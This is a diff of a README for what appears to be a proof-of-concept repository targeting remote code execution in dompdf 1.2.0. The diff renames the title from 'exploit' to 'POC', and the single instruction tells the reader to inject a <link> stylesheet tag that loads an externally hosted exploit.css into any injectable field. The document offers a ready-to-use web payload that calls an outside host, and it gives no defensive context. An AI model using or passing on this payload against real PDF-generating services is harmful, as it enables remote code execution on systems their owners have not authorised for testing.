abhishekg999/dompdf/README.md

-# Live RCE exploit for dompdf 1.2.0
+# Live RCE POC for dompdf 1.2.0

 1. Use the following <link> tag in any injectable field:
    - `<link rel=stylesheet href='https://abhishekg999.github.io/dompdf/exploit.css'>`